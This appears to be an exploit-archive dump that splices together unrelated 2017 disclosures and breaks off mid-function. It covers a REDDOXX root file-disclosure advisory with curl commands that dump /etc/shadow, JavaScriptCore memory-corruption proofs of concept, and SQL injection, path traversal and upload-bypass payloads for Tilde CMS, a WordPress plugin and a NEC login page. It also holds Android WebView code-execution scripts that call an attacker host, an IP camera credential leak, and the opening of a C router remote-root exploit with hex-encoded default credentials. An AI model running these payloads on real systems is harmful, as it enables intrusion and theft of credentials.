Advisory: Arbitrary File Disclosure with root Privileges via RdxEngine-API in REDDOXX Appliance
RedTeam Pentesting discovered an arbitrary file disclosure vulnerability
in the REDDOXX appliance software, which allows unauthenticated
attackers to list directory contents and download arbitrary files from
the affected system with root permissions.
Details
=======
Product: REDDOXX Appliance
Affected Versions: Build 2032 / v2.0.625, older versions likely affected too
Fixed Versions: Version 2032 SP2
Vulnerability Type: Arbitrary File Disclosure
Security Risk: high
Vendor URL: https://www.reddoxx.com/
Vendor Status: patch available
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2017-006
Advisory Status: published
CVE: GENERIC-MAP-NOMATCH
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH
Introduction
============
"REDDOXX is a leading supplier of solutions for e-mail archiving,
encrypted and digitally signed e-mail traffic as well as spam
protection. Our focus is on technological innovation: taking our cue
from our clientsâ?? requirements our competent and quality-conscious
employees strive to offer you the best possible products at all times.
Using stringent quality standards and proven processes we keep
developing our company and products continuously, with the goal of
continuous improvement."
(from the vendor's homepage)
More Details
============
When using the user frontend of the REDDOXX appliance [0] reachable via
http://www.example.com/rws/user/, HTTP POST requests are used to perform
certain actions. For example, the following request is used to save the
settings of the current user's profile:
------------------------------------------------------------------------
POST /RdxEngine/json HTTP/1.1
Host: www.example.com
[...]
Content-Type: application/x-www-form-urlencoded
Content-Length: 210
Connection: close
{
"method": "CoreService.SaveUserProfile",
"params": {
"Profile": {
"UseHtmlMail": true,
"DefaultArchiveDisplayPeriode": "5",
"ReportLanguage": "en",
"EnableQueueReport": true
}
},
"id": "{XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX}"
}
------------------------------------------------------------------------
Through analysis of the .NET binaries pertaining to this endpoint,
extracted from the appliance ISO offered on the vendor's homepage [1],
the methods handling these requests were examined. For the
"SaveUserProfile" method, which is specified through the POST parameter
"method", the code is as follows:
------------------------------------------------------------------------
// Reddoxx.Api.Legacy.CoreServiceService
public void SaveUserProfile(TRoUserProfile Profile)
{
try
{
this.client.OnStartRequest("CoreService", "SaveUserProfile");
this.Service.SaveUserProfile(Profile);
this.client.OnEndRequest("CoreService", "SaveUserProfile");
}
catch (System.Exception e)
{
this.client.HandleException("CoreService", "SaveUserProfile", e);
}
}
------------------------------------------------------------------------
The "TroUserProfile" class contains information about the parameters
that are required for valid requests to this method:
------------------------------------------------------------------------
namespace Reddoxx.Api.Legacy
{
[...]
public class TRoUserProfile : ComplexType
{
private string __ReportLanguage;
private int __DefaultArchiveDisplayPeriode;
private bool __EnableQueueReport;
private bool __UseHtmlMail;
[...]
}
}
------------------------------------------------------------------------
These variable names correspond to the POST parameters contained in the
request that was created when the profile was saved. With this knowledge
about how methods are called and parameters are passed, it was attempted
to call other methods from different packages. It was determined that it
is possible to access certain methods which allow reading arbitrary
files and directory listings.
It was later discovered that the process handling requests to the
vulnerable methods runs with root privileges.
Proof of Concept
================
At least two methods are found to be of interest for attackers:
FileTransfer.GetDirectoryList, which returns a directory listing for a
path specified via a parameter, and FileTransfer.DownloadFile, which
returns the file specified via a parameter in Base64-encoded form. The
following curl command-lines can be used to call the respective methods:
------------------------------------------------------------------------
$ curl --silent --data-binary '{"id":"{XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX}",''"method":"FileTransfer
.GetDirectoryList","params":{"Directory": "/etc/"}}' 'http://www.example.com/RdxEngine/json' | jq '.result.FileInfoList[].FileName'
"chatscripts"
"gtk-2.0"
"xen"
"dbus-1"
"request-key.d"
"smartmontools"
"console"
"skel"
"xml"
"initramfs-tools"
"sysctl.d"
"pear"
"sudoers.d"
"cron.monthly"
"rc5.d"
"init"
"byobu"
"pki"
"xpdf"
"cron.weekly"
"snmp"
"ld.so.conf.d"
[...]
------------------------------------------------------------------------
Since the process handling the requests runs with root privileges, it
was also possible to read the contents of the file "/etc/passwd":
------------------------------------------------------------------------
$ curl --silent --data-binary '{"id":"{XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX}",''"method":"FileTransfer
.DownloadFile","params":{"FileName": "/etc/shadow",''"Sequence": 1,"ChunkSize": 10000}}' 'http://www.example.com/RdxEngine/json' | jq -r .result.ChunkData | tr -d '\r\n' | base64 -d
root:$6$XXXXXXXX$YYYYYYY[...]YYYYYYYY:14993:0:99999:7:::
daemon:*:16652:0:99999:7:::
bin:*:16652:0:99999:7:::
sys:*:16652:0:99999:7:::
sync:*:16652:0:99999:7:::
games:*:16652:0:99999:7:::
man:*:16652:0:99999:7:::
lp:*:16652:0:99999:7:::
mail:*:16652:0:99999:7:::
news:*:16652:0:99999:7:::
uucp:*:16652:0:99999:7:::
proxy:*:16652:0:99999:7:::
www-data:*:16652:0:99999:7:::
backup:*:16652:0:99999:7:::
list:*:16652:0:99999:7:::
irc:*:16652:0:99999:7:::
gnats:*:16652:0:99999:7:::
nobody:*:16652:0:99999:7:::
libuuid:!:16652:0:99999:7:::
syslog:*:16652:0:99999:7:::
messagebus:*:16899:0:99999:7:::
sshd:*:16899:0:99999:7:::
vboxadd:!:16899::::::
statd:*:16899:0:99999:7:::
admin:$1$XXXXXXXX$ZZZZZZZZZZZZZZZZZZZZZZ:14054:0:99999:7:::
clamav:!:16899:0:99999:7:::
ntp:*:16899:0:99999:7:::
hacluster:!:16899:0:99999:7:::
firebird:*:16899:0:99999:7:::
redis:!:16899:0:99999:7:::
snmp:*:16899:0:99999:7:::
bind:*:16899:0:99999:7:::
smbadmin:!:17037:0:99999:7:::
smbuser:!:17037:0:99999:7:::
------------------------------------------------------------------------
Workaround
==========
None
Fix
===
Update the appliance software to Version 2032 SP2.
Security Risk
=============
Attackers with access to a REDDOXX appliance are able to retrieve
directory listings and content of arbitrary files. Although this
vulnerability requires attackers to submit a valid session ID, the
vulnerabilities described in rt-sa-2017-004 [2] and rt-sa-2017-005 [3]
show how this requirement can be fulfilled even by attackers without
valid credentials. Additionally, the RdxEngine process handling the
requests to the vulnerable methods runs with root privileges, allowing
attackers to read any file on the filesystem and, for example, extract
the local user hashes for offline brute-force attacks. This
vulnerability is therefore rated as a high risk.
Timeline
========
2017-05-17 Vulnerability identified
2017-05-23 Customer approved disclosure of vulnerability
2017-05-26 Customer provided details of vulnerability to vendor
2017-07-20 Vulnerability reported as fixed by vendor
2017-07-24 Advisory released
References
==========
[0] https://www.reddoxx.com/en/
[1] https://my.reddoxx.com/documents/manual/en/custdl/product-downloads
(Requires login)
[2] https://www.redteam-pentesting.de/advisories/rt-sa-2017-004
[3] https://www.redteam-pentesting.de/advisories/rt-sa-2017-005
RedTeam Pentesting GmbH
=======================
RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.
As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.
More information about RedTeam Pentesting can be found at:
https://www.redteam-pentesting.de/
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1234
Here's a snippet of DFG::ByteCodeParser::flush(InlineStackEntry* inlineStackEntry).
void flush(InlineStackEntry* inlineStackEntry)
{
...
if (m_graph.needsScopeRegister())
flush(m_codeBlock->scopeRegister()); <<--- (a)
}
At (a), it should flush the scope register of |inlineStackEntry->m_codeBlock| instead of |m_codeBlock|. But it doesn't. As a result, the scope register of |inlineStackEntry->m_codeBlock| may have an incorrect offset in the stack layout phase.
PoC:
-->
function f() {
(function () {
eval('1');
f();
}());
throw 1;
}
f();
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1234
Here's a snippet of arrayProtoFuncSplice.
EncodedJSValue JSC_HOST_CALL arrayProtoFuncSplice(ExecState* exec)
{
...
result = JSArray::tryCreateForInitializationPrivate(vm, exec->lexicalGlobalObject()->arrayStructureForIndexingTypeDuringAllocation(ArrayWithUndecided), actualDeleteCount);
if (UNLIKELY(!result)) {
throwOutOfMemoryError(exec, scope);
return encodedJSValue();
}
// The result can have an ArrayStorage indexing type if we're having a bad time.
bool isArrayStorage = hasAnyArrayStorage(result->indexingType());
bool success = false;
if (UNLIKELY(isArrayStorage)) {
static const bool needToFillHolesManually = true;
success = copySplicedArrayElements<needToFillHolesManually>(exec, scope, result, thisObj, actualStart, actualDeleteCount);
} else {
ASSERT(hasUndecided(result->indexingType()));
static const bool needToFillHolesManually = false;
success = copySplicedArrayElements<needToFillHolesManually>(exec, scope, result, thisObj, actualStart, actualDeleteCount);
}
if (UNLIKELY(!success)) {
ASSERT(scope.exception());
return encodedJSValue();
}
...
}
|result| has uninitalized values. If a GC is triggered before those values get initalized, the garbage collector will refer the uninitialized values.
PoC:
-->
function gc() {
for (let i = 0; i < 4; i++)
new ArrayBuffer(0x1000000);
}
Array.prototype.__defineGetter__(1000, () => 0);
for (let i = 0; i < 0x1000; i++)
new Array(0x10).fill([{}, {}, {}, {}]);
for (let i = 0; i < 0x1000; i++) {
let x = {length: 0x10};
x.__defineGetter__(0, () => gc());
Array.prototype.splice.call(x, 0);
}
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1236
WebKit: JSC: JSArray::appendMemcpy uninitialized memory copy
Here's a snippet of JSArray::appendMemcpy.
bool JSArray::appendMemcpy(ExecState* exec, VM& vm, unsigned startIndex, JSC::JSArray* otherArray)
{
auto scope = DECLARE_THROW_SCOPE(vm);
if (!canFastCopy(vm, otherArray))
return false;
IndexingType type = indexingType();
IndexingType copyType = mergeIndexingTypeForCopying(otherArray->indexingType());
if (type == ArrayWithUndecided && copyType != NonArray) {
if (copyType == ArrayWithInt32)
convertUndecidedToInt32(vm);
else if (copyType == ArrayWithDouble)
convertUndecidedToDouble(vm);
else if (copyType == ArrayWithContiguous)
convertUndecidedToContiguous(vm);
else {
ASSERT(copyType == ArrayWithUndecided);
return true;
}
} else if (type != copyType)
return false;
...
if (type == ArrayWithDouble)
memcpy(butterfly()->contiguousDouble().data() + startIndex, otherArray->butterfly()->contiguousDouble().data(), sizeof(JSValue) * otherLength);
else
memcpy(butterfly()->contiguous().data() + startIndex, otherArray->butterfly()->contiguous().data(), sizeof(JSValue) * otherLength);
return true;
}
The method considers the case where |this|'s type is ArrayWithUndecided, but does not consider whether |otherArray|'s type is ArrayWithUndecided that may have uninitialized data.
So, when the memcpy function is called, |otherArray|'s uninitialized memory may be copied to |this| which has a type.
PoC:
-->
function optNewArrayAndConcat() {
let a = [,,,,,,,,,];
return Array.prototype.concat.apply(a);
}
function main() {
Array.prototype.constructor = {
[Symbol.species]: function () {
return [{}];
}
};
gc();
for (let i = 0; i < 0x10000; i++) {
optNewArrayAndConcat().fill({});
}
gc();
for (let i = 0; i < 0x20000; i++) {
let res = optNewArrayAndConcat();
if (res[0])
print(res.toString());
}
}
main();
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1262
Here is a snippet of ArgumentsEliminationPhase::transform
case LoadVarargs:
...
if (candidate->op() == PhantomNewArrayWithSpread || candidate->op() == PhantomSpread) {
...
if (argumentCountIncludingThis <= varargsData->limit) {
storeArgumentCountIncludingThis(argumentCountIncludingThis);
// store arguments
...
}
node->remove();
node->origin.exitOK = canExit;
break;
}
Whether or not the "argumentCountIncludingThis <= varargsData->limit" condition is satisfied, it removes the |node| variable and exits the switch statement. So in this case the condition is not satisfied, the arguments object created by the following code(CreateDirectArguments in the PoC) may have uninitialized values and length.
PoC:
-->
const kArgsLength = 0x101;
let buggy = null;
function inlineFunc() {
if (arguments.length != kArgsLength) {
buggy = arguments;
}
}
class ClassForInine extends inlineFunc {
}
function sleep(ms) {
let start = new Date();
while (new Date() - start < ms);
}
function main() {
let args = new Array(kArgsLength);
args.fill(333 + 1);
args = args.join(', ');
let opt = new Function(`(() => {
new ClassForInine(${args});
})();`);
for (let i = 0; i < 0x100000; i++) {
opt();
if (i === 0x3000)
sleep(1000);
if (buggy) {
print('buggy.length: ' + buggy.length);
break;
}
}
for (let i = 0, n = buggy.length; i < n; i++) {
print(buggy[i]);
}
}
main();
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1256
Here's a snippet of ObjectPatternNode::appendEntry.
void appendEntry(const JSTokenLocation&, ExpressionNode* propertyExpression, DestructuringPatternNode* pattern, ExpressionNode* defaultValue, BindingType bindingType)
{
m_targetPatterns.append(Entry{ Identifier(), propertyExpression, false, pattern, defaultValue, bindingType });
}
Here's the definition of Entry.
struct Entry {
const Identifier& propertyName;
ExpressionNode* propertyExpression;
bool wasString;
DestructuringPatternNode* pattern;
ExpressionNode* defaultValue;
BindingType bindingType;
};
The Identifier object created by "Identifier()" is in the stack. So it will get freed in the end of the appendEntry method.
PoC:
var {[a]: b, ...[]} = {};
# Exploit Title: Tilde CMS 1.01 Multiple Vulnerabilities
# Date: July 7th, 2017
# Exploit Authors: Paolo Forte, Raffaele Forte <raffaele@backbox.org>
# Vendor Homepage: http://www.tildenetwork.com/
# Version: Tilde CMS 1.0.1
# Tested on: Ubuntu 12.04, PHP 5.3.10
I. INTRODUCTION
========================================================================
Tilde CMS is closed-source content management system created by
tildenetwork.com
II. DESCRIPTION
========================================================================
The web application suffers of multiple vulnerabilities.
1. SQL Injection
------------------------------------------------------------------------
Due to missing escaping of the backtick character, the following query in
the source code is vulnerable:
[class.SystemAction.php]
$SQL_string = "SELECT * FROM `form_table_".$id_form."` WHERE ID='$idForm'";
$SQL_oldData = @mysql_query($SQL_string,$this->DB_conn);
The vulnerability can be trigged via a POST request as shown in the
following PoC:
POST /actionphp/action.input.php HTTP/1.1
ActionForm=SendForm&TotalQuery=653&TotalCompiled=2&id=1` WHERE
SLEEP(5)-- aaa &idForm=1234567890
The resulting query on the server-side will be:
SELECT * FROM `form_table_1` WHERE SLEEP(5)-- aaa ` WHERE ID='1234567890'
For a succesful exploitation, the table "form_table_1" must be valid.
2. Path Traversal
------------------------------------------------------------------------
The vulnerabilty exists on this method:
GET /actionphp/download.File.php?&file=../../../../../../etc/passwd
3. Arbitrary Files Upload
------------------------------------------------------------------------
It is possible to bypass the implemented restrictions shown in the
following snippet of the code:
$file=$_FILES['file'.$i]['tmp_name'];
if (($file!="")&&($file!="none")) {
$source_file=$file;
$file_name=$_FILES['file'.$i]['name'];
$file_name=str_replace(".php",".txt",$file_name);
$file_name=str_replace(" ","_",$file_name);
$file_name=str_replace("+","",$file_name);
A file named "filename.+php" will be renamed in "filename.php", therefore
successfully uploaded.
4. Insecure Direct Object References
------------------------------------------------------------------------
It is possible to retrieve sensitive resources by using direct references.
A low privileged user can load the PHP resources such as:
admin/content.php
admin/content.php?method=ftp_upload
IV. BUSINESS IMPACT
========================================================================
These flaws may compromise the integrity of the system and/or expose
sensitive information.
V. SYSTEMS AFFECTED
========================================================================
Tilde CMS 1.01 is vulnerable (probably all previous versions)
VI. VULNERABILITY HISTORY
========================================================================
July 6th, 2017: Vulnerability identification
July 7th, 2017: Vendor notification
July 13th, 2017: Vendor notification
VII. LEGAL NOTICES
========================================================================
The information contained within this advisory is supplied "as-is" with
no warranties or guarantees of fitness of use or otherwise. We accept no
responsibility for any damage caused by the use or misuseof this
information.
# Exploit Title: SKILLS.com.au Industry App - Remote Code Execution via MITM
# Date: 20/Jul/17
# Exploit Author: MaXe
# Vendor Homepage: https://play.google.com/store/apps/details?id=a3.skills.com [http://archive.is/NRlNP]
# Software Link: N/A
# Screenshot: N/A
# Version: 1.0
# Tested on: Android 4.1.0 (Google APIs) - API Level 16 - x86
# CVE : N/A
SKILLS.com.au Industry App - Remote Code Execution via MITM
Version affected: 1.0
App Info: The Android application reviewed is used to log into the skills.com.au website.
External Links:
https://play.google.com/store/apps/details?id=a3.skills.com [http://archive.is/NRlNP]
Credits: MaXe (@InterN0T)
Special Thanks: Geoff Ellis for also identifying credentials being sent over HTTP GET requests before InterN0T did:
https://www.linkedin.com/pulse/insecure-mobile-application-programming-practices-case-geoff-ellis [http://archive.is/LvSeb]
Reference: "String str2 = "http://www.skills.com.au/auth.asp?Username=" + stringUtils.Encodeproton-Url(mostCurrent._edittext1.getText(), "UTF8") + "&Password=" + stringUtils.Encodeproton-Url(mostCurrent._edittext2.getText(), "UTF8");"
Shouts: SubHacker and the rest of the awesome infosec community.
-:: The Advisory ::-
The Android application is vulnerable to Remote Code Execution via Man-In-The-Middle (MITM) attacks.
This is caused by the following lines of code within the \a3\skills\com\main.java: (Lines 442 - 448)
StringUtils stringUtils = new StringUtils();
String str2 = "http://www.skills.com.au/auth.asp?Username=" + stringUtils.EncodeUrl(mostCurrent._edittext1.getText(), "UTF8") + "&Password=" + stringUtils.EncodeUrl(mostCurrent._edittext2.getText(), "UTF8");
WebViewExtras webViewExtras = mostCurrent._webviewextras1;
WebViewExtras.addJavascriptInterface(mostCurrent.activityBA, (WebView) mostCurrent._webview1.getObject(), "B4A");
mostCurrent._webview1.LoadUrl(str2);
mostCurrent._t.Initialize(processBA, "LOGGINGIN", 15000);
mostCurrent._t.setEnabled(true);
In addition to the above, the following App configuration also aids in the exploitability of this issue: (File: AndroidManifest.xml)
<uses-sdk android:minSdkVersion="5" android:targetSdkVersion="14" />
If an attacker performs a MITM attack against "www.skills.com.au" by e.g. hijacking the domain name, DNS, IP prefix, or by
serving a malicious wireless access point (or hijacking a legitimate one), or by hacking the server at "www.skills.com.au",
then the attacker can instruct the Android application to execute attacker controlled Java code that the phone will execute
in the context of the application.
The root cause of this vulnerability is caused by addJavascriptInterface() within the WebViewer, which in older API versions
can be used to execute arbitrary Java code by using reflection to access public methods with attacker provided JavaScript.
-:: Proof of Concept ::-
A successful attack that makes "www.skills.com.au" serve the following code:
<script>
function execute(cmd){
return B4A.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec(cmd);
}
execute(['/system/bin/sh', '-c', 'echo InterN0T was here > /data/data/a3.skills.com/owned']);
execute(['/system/bin/sh', '-c', 'am start -a android.intent.action.VIEW -d "http://attacker-domain.tld/video.mp4"']);
</script>
This application has been owned.
Will make the Android application create a new file in the App directory named: owned, and also play a video chosen by the attacker as an example.
Instead of creating a new file, the attacker can also use the "drozer" payload for example. Refer to the references further below.
The vulnerable HTTP request is triggered when a user attempts to log in with any set of credentials.
-:: Solution ::-
The Android app code should not use the addJavaScriptInterface() function. Instead the following code should be used:
WebView webView = new WebView(this);
setContentView(webView);
...
Alternatively, the application manifest should specify API levels JELLY_BEAN_MR1 and above as follows:
<manifest>
<uses-sdk android:minSdkVersion="17" />
...
</manifest>
The URL used ("http://www.skills.com.au") should ALSO use HTTPS (and verify the hostname and certificate properly).
Last but not least, the following code can also be used to determine whether the addJavascriptInterface should be enabled or not:
private void exposeJsInterface() {
if (VERSION.SDK_INT < 17) {
Log.i(TAG, "addJavascriptInterface() bridge disabled.");
} else {
addJavascriptInterface(Object, "EVENT_NAME_HERE");
}
}
In relation to the credentials being sent over plain-text HTTP GET requests, the following are the most basic recommendations to be implemented:
- All URLS within the application must utilize HTTPS.
- Certificate pinning should also be implemented.
- Usernames and passwords should not be sent over HTTP GET requests, HTTP POST requests should be used instead.
References:
http://50.56.33.56/blog/?p=314
https://developer.android.com/reference/android/webkit/WebView.html#addJavascriptInterface(java.lang.Object, java.lang.String)
https://labs.mwrinfosecurity.com/blog/webview-addjavascriptinterface-remote-code-execution/
https://labs.mwrinfosecurity.com/advisories/webview-addjavascriptinterface-remote-code-execution/
https://www.securecoding.cert.org/confluence/pages/viewpage.action?pageId=129859614
Filename: a3.skills.com_manual.apk
File size: 332,914 bytes
md5: d1022a25893ec8549234d20fa55c13f8
sha1: 96f85493332e9b2a2efecc4acdca75f84c13809d
sha256: e1724043dbca70a76a33598d3483fba51ae171ed0d05a4e5cacab103c1c2a21c
App Name: SKILLS.com.au Industry App
Package Name: a3.skills.com
Package Version: 1.0
Disclosure Timeline:
- 20Jul17: Vendor is informed about advisories.
- 20Jul17: Vendor responds: https://ghostbin.com/paste/jrt2e#L28
- 20Jul17: InterN0T email to vendor: https://ghostbin.com/paste/zjcam
- 20Jul17: Vendor responds: https://ghostbin.com/paste/vzv3y
- 20Jul17: Advisory released to the public.
=== EOF ===
# Exploit Title: Virtual Postage (VPA) - Remote Code Execution via MITM
# Date: 20/Jul/17
# Exploit Author: MaXe
# Vendor Homepage: https://play.google.com/store/apps/details?id=a2.virtualpostage.com [http://archive.is/EdtJT]
# Software Link: N/A
# Screenshot: N/A
# Version: 1.0
# Tested on: Android 4.1.0 (Google APIs) - API Level 16 - x86
# CVE : N/A
Virtual Postage (VPA) - Remote Code Execution via MITM
Version affected: 1.0
App Info: The Android application reviewed allows a user to calculate how much postage will cost.
External Links:
https://play.google.com/store/apps/details?id=a2.virtualpostage.com [http://archive.is/EdtJT]
Credits: MaXe (@InterN0T)
Special Thanks: Geoff Ellis for also identifying credentials being sent over HTTP GET requests before InterN0T did:
https://www.linkedin.com/pulse/insecure-mobile-application-programming-practices-case-geoff-ellis [http://archive.is/LvSeb]
Reference: "String str2 = "http://www.virtualpostage.com.au/auth.asp?Username=" + stringUtils.Encodeproton-Url(mostCurrent._edittext1.getText(), "UTF8") + "&Password=" + stringUtils.Encodeproton-Url(mostCurrent._edittext2.getText(), "UTF8");"
Shouts: SubHacker and the rest of the awesome infosec community.
-:: The Advisory ::-
The Android application is vulnerable to Remote Code Execution via Man-In-The-Middle (MITM) attacks.
This is caused by the following lines of code within the \a2\virtualpostage\com\main.java file: (Lines 442 - 448)
StringUtils stringUtils = new StringUtils();
String str2 = "http://www.virtualpostage.com.au/auth.asp?Username=" + stringUtils.EncodeUrl(mostCurrent._edittext1.getText(), "UTF8") + "&Password=" + stringUtils.EncodeUrl(mostCurrent._edittext2.getText(), "UTF8");
WebViewExtras webViewExtras = mostCurrent._webviewextras1;
WebViewExtras.addJavascriptInterface(mostCurrent.activityBA, (WebView) mostCurrent._webview1.getObject(), "B4A");
mostCurrent._webview1.LoadUrl(str2);
mostCurrent._t.Initialize(processBA, "LOGGINGIN", 15000);
mostCurrent._t.setEnabled(true);
In addition to the above, the following App configuration also aids in the exploitability of this issue: (File: AndroidManifest.xml)
<uses-sdk android:minSdkVersion="5" android:targetSdkVersion="14" />
If an attacker performs a MITM attack against "www.virtualpostage.com.au" by e.g. hijacking the domain name, DNS, IP prefix, or by
serving a malicious wireless access point (or hijacking a legitimate one), or by hacking the server at "www.virtualpostage.com.au",
then the attacker can instruct the Android application to execute attacker controlled Java code that the phone will execute in the
context of the application.
The root cause of this vulnerability is caused by addJavascriptInterface() within the WebViewer, which in older API versions can be
used to execute arbitrary Java code by using reflection to access public methods with attacker provided JavaScript.
-:: Proof of Concept ::-
A successful attack that makes "www.virtualpostage.com.au" serve the following code:
<script>
function execute(cmd){
return B4A.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec(cmd);
}
execute(['/system/bin/sh', '-c', 'echo InterN0T was here > /data/data/a2.virtualpostage.com/owned']);
execute(['/system/bin/sh', '-c', 'am start -a android.intent.action.VIEW -d "http://attacker-domain.tld/video.mp4"']);
</script>
This application has been owned.
Will make the Android application create a new file in the App directory named: owned, and also play a video chosen by the attacker as an example.
Instead of creating a new file, the attacker can also use the "drozer" payload for example. Refer to the references further below.
The vulnerable HTTP request is triggered when a user attempts to log in with any set of credentials.
-:: Solution ::-
The Android app code should not use the addJavaScriptInterface() function. Instead the following code should be used:
WebView webView = new WebView(this);
setContentView(webView);
...
Alternatively, the application manifest should specify API levels JELLY_BEAN_MR1 and above as follows:
<manifest>
<uses-sdk android:minSdkVersion="17" />
...
</manifest>
The URL used ("http://www.virtualpostage.com.au") should ALSO use HTTPS (and verify the hostname and certificate properly).
Last but not least, the following code can also be used to determine whether the addJavascriptInterface should be enabled or not:
private void exposeJsInterface() {
if (VERSION.SDK_INT < 17) {
Log.i(TAG, "addJavascriptInterface() bridge disabled.");
} else {
addJavascriptInterface(Object, "EVENT_NAME_HERE");
}
}
In relation to the credentials being sent over plain-text HTTP GET requests, the following are the most basic recommendations to be implemented:
- All URLS within the application must utilize HTTPS.
- Certificate pinning should also be implemented.
- Usernames and passwords should not be sent over HTTP GET requests, HTTP POST requests should be used instead.
References:
http://50.56.33.56/blog/?p=314
https://developer.android.com/reference/android/webkit/WebView.html#addJavascriptInterface(java.lang.Object, java.lang.String)
https://labs.mwrinfosecurity.com/blog/webview-addjavascriptinterface-remote-code-execution/
https://labs.mwrinfosecurity.com/advisories/webview-addjavascriptinterface-remote-code-execution/
https://www.securecoding.cert.org/confluence/pages/viewpage.action?pageId=129859614
Filename: a2.virtualpostage.com_manual.apk
File size: 304,307 bytes
md5: 1da27e27eb8447ab489eb1aae3cd14f6
sha1: f67a2c1f55879024c5ecd1194e6704a4286ea021
sha256: 0813eb25d08d877af66c8570153580da2c1df3fb873270422dca6be8dbe98932
App Name: VPA
Package Name: a2.virtualpostage.com
Package Version: 1.0
Disclosure Timeline:
- 20Jul17: Vendor is informed about advisories.
- 20Jul17: Vendor responds: https://ghostbin.com/paste/jrt2e#L28
- 20Jul17: InterN0T email to vendor: https://ghostbin.com/paste/zjcam
- 20Jul17: Vendor responds: https://ghostbin.com/paste/vzv3y
- 20Jul17: Advisory released to the public.
=== EOF ===
# Exploit Title: IBPS Online Exam Plugin for WordPress v1.0 - XSS SQLi
# Date: 2017-07-11
# Exploit Author: 8bitsec
# Vendor Homepage: https://elfemo.com/demo/server2/order2032/
# Software Link: https://codecanyon.net/item/ibps-online-exam-plugin-for-wordpress/20028534
# Version: 1.0
# Tested on: [Kali Linux 2.0 | Mac OS 10.12.5]
# Email: contact@8bitsec.io
# Contact: https://twitter.com/_8bitsec
Release Date:
=============
2017-07-20
Product & Service Introduction:
===============================
A Full Featured WordPress Plugin for IBPS Examination.
Technical Details & Description:
================================
Stored XSS on exam input textfields.
Blind SQL Injection on examapp_UserResult page id parameter.
Proof of Concept (PoC):
=======================
Authenticated Stored XSS:
Logged as a student:
Write the payload in the input textfields while attempting an exam. The payload will execute on My Results > View Details:
https://localhost/wp-admin/admin.php?page=examapp_UserResult&info=view&id=[xx]
Blind SQL Injection
Logged as a student:
https://localhost/wp-admin/admin.php?page=examapp_UserResult&info=view&id=79 and 1=1
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: page=examapp_UserResult&info=view&id=78 AND 6705=6705
Type: UNION query
Title: Generic UNION query (NULL) - 17 columns
Payload: page=examapp_UserResult&info=view&id=-4748 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7178716b71,0x6b4c5247597261614e73447378544741764b4f7172597a5a58494551685a7056644d6e595773496e,0x7162787671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- KttP
Credits & Authors:
==================
8bitsec - [https://twitter.com/_8bitsec]
# Exploit Title: IP Camera VACRON VIG-US731VE
# Date: 2017-07-18
# Exploit Author: anonymous
# Vendor Homepage: www.vacron.com
# Version: V1.0.18-09-B727
1. doesn't require credentials to fetch snapshot like this: http://192.168.0.200/ipcam/jpeg
2. allows "viewer" level user to fetch any camera setting, eg admin user and password: http://192.168.0.200/vb.htm?adminid&adminpwd
there is newer firmware available from the vendor, but I haven't tested on that one.
# Exploit Title: NEC UNIVERGE UM4730 < 11.8 SQL injection
# Vulnerbility: SQL injection login bypass
# Date: 15-12-2016
# Exploit Author: b0x41s
# Author web: https://www.xrayit.nl
# Vendor Homepage: https://www.nec-enterprise.com
# Category: webapps
# Version: 11.6.0.31
# Tested on: Windows server 2008
Description:
The auth_user parameter is vulnerable to SQL injection.
The login can be bypassed.
POC:
POST /admin/index.php HTTP/1.1
Host: 127.0.0.1
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: https://127.0.0.1/admin/index.php
Content-Type: application/x-www-form-urlencoded
Content-Lenght: 105
Cookie: PHPSESSID=dadu22lsue7utch05a24lgp54; g_lang=en
submitButton=submitButton%3dSing+in&formSubmitted=1&auth_pw=root&auth_user='%20or%201=1--%20-&login_language_select=de
Fix answer from vendor:
The WAC login page is no longer available to sql injection bypassing authentication.The fix was committed prior to releasing 11.8.
/* PK5001Z CenturyLink Router/Modem remote root exploit */
/* oxagast / Marshall Whittaker */
/* marshall@likon:[~/Code/pk5001zpwn]: gcc pk5001z00pin.c -o pk5001z00pin */
/* marshall@likon:[~/Code/pk5001zpwn]: ./pk5001z00pin */
/* PK5001Z CenturyLink Router remote root 0day */
/* Enjoy! */
/* --oxagast */
/* marshall@likon:[~/Code/pk5001zpwn]: ./pk5001z00pin 192.168.0.1 */
/* */
/* # uname -a; id; */
/* Linux PK5001Z 2.6.20.19 #54 Wed Oct 14 11:17:48 CST 2015 mips unknown */
/* uid=0(root) gid=0(root) */
/* # */
/* */
#include <arpa/inet.h>
#include <errno.h>
#include <fcntl.h>
#include <netdb.h>
#include <netinet/in.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <unistd.h>
#include <signal.h>
#define END_STRING "chau\n"
#define COMPLETE_STRING "fin-respuesta"
#ifndef MSG_NOSIGNAL
#define MSG_NOSIGNAL SO_NOSIGPIPE
#endif
#define perro(x) \
{ \
fprintf(stderr, "%s:%d: %s: %s\n", __FILE__, __LINE__, x, \
strerror(errno)); \
exit(1); \
}
void send_root(int sock, int pid) {
char buf[1024] = {0};
char getal[1024] = "\x61\x64\x6d\x69\x6e\x0a";
char getap[1024] = "\x43\x65\x6e\x74\x75\x72\x79\x4c\x31\x6e\x6b\x0a";
char getrl[1024] = "\x73\x75\x20\x72\x6f\x6f\x74\x0a";
